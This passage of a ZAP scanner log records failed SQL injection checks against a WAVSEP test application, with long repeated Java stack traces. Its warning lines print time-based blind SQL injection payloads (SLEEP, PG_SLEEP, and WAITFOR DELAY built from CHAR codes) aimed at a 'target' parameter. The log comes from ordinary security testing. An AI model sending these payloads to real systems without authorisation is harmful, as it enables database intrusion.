org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962801 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp');(SELECT * FROM (SELECT(SLEEP(5)))Cxiw)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp');(SELECT * FROM (SELECT(SLEEP(5)))Cxiw)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962802 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp';(SELECT * FROM (SELECT(SLEEP(5)))ZxaP)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp';(SELECT * FROM (SELECT(SLEEP(5)))ZxaP)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962804 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%';(SELECT * FROM (SELECT(SLEEP(5)))ORoU)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%';(SELECT * FROM (SELECT(SLEEP(5)))ORoU)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962806 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp;(SELECT * FROM (SELECT(SLEEP(5)))qVPN)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp;(SELECT * FROM (SELECT(SLEEP(5)))qVPN)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962807 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp);SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp);SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962809 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962810 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp');SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp');SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962811 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962813 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962814 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962816 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962817 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962818 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962820 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error 